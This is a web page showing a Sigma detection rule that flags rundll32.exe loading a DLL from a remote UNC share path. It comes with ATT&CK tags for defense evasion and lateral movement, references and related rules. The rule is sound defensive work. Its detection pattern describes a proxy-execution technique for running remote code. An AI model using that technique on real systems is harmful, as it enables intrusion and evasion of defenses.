Rundll32 UNC Path Execution
Detects rundll32 execution where the DLL is located on a remote location (share)
Sigma rule (View on GitHub)
1title: Rundll32 UNC Path Execution
2id: 5cdb711b-5740-4fb2-ba88-f7945027afac
3status: test
4description: Detects rundll32 execution where the DLL is located on a remote location (share)
5references:
6 - https://www.cybereason.com/blog/rundll32-the-infamous-proxy-for-executing-malicious-code
7author: Nasreddine Bencherchali (Nextron Systems)
8date: 2022-08-10
9tags:
10 - attack.defense-evasion
11 - attack.execution
12 - attack.lateral-movement
13 - attack.t1021.002
14 - attack.t1218.011
15logsource:
16 category: process_creation
17 product: windows
18detection:
19 selection_img:
20 - Image|endswith: '\rundll32.exe'
21 - OriginalFileName: 'RUNDLL32.EXE'
22 - CommandLine|contains: 'rundll32'
23 selection_cli:
24 CommandLine|contains: ' \\\\'
25 condition: all of selection_*
26falsepositives:
27 - Unlikely
28level: high
References
-
Take a deeper dive into an often abused Microsoft-signed tool, the infamous rundll32.exe, which allows adversaries to execute malicious code during their offensive operations through a technique which we explain in detail...
Read More
Related rules
- Potentially Suspicious Rundll32.EXE Execution of UDL File
- Kapeka Backdoor Loaded Via Rundll32.EXE
- Potential Raspberry Robin CPL Execution Activity
- Remote Thread Creation Via PowerShell In Uncommon Target
- APT29 2018 Phishing Campaign CommandLine Indicators